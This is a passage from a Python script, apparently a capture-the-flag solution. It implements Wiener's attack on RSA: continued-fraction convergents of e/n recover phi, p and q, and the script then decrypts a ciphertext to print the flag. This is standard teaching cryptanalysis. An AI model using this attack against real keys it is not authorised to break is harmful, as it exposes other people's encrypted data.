| 45 | cf = cf_expansion(e,n) 46 | cons = convergents(cf) 47 | 48 | for k,d in cons: 49 | if k == 0: 50 
| continue 51 | phi = (e*d - 1)//k 52 | p = Symbol('p', integer=True) 53 | roots = solve(p**2 + (phi - n - 1)*p + n, p) 54 | if len(roots) == 2 and roots[0]*roots[1] == n: 55 | print('found p and q') 56 | print('#########################') 57 | p = roots[0] 58 | q = roots[1] 59 | break 60 | 61 | phi = (p-1)*(q-1) 62 | d = inverse(e,phi) 63 | flag = pow(c,d,n) 64 | 65 | print(f'The flag is : {bytearray.fromhex(hex(flag)[2:])}') --------------------------------------------------------------------------------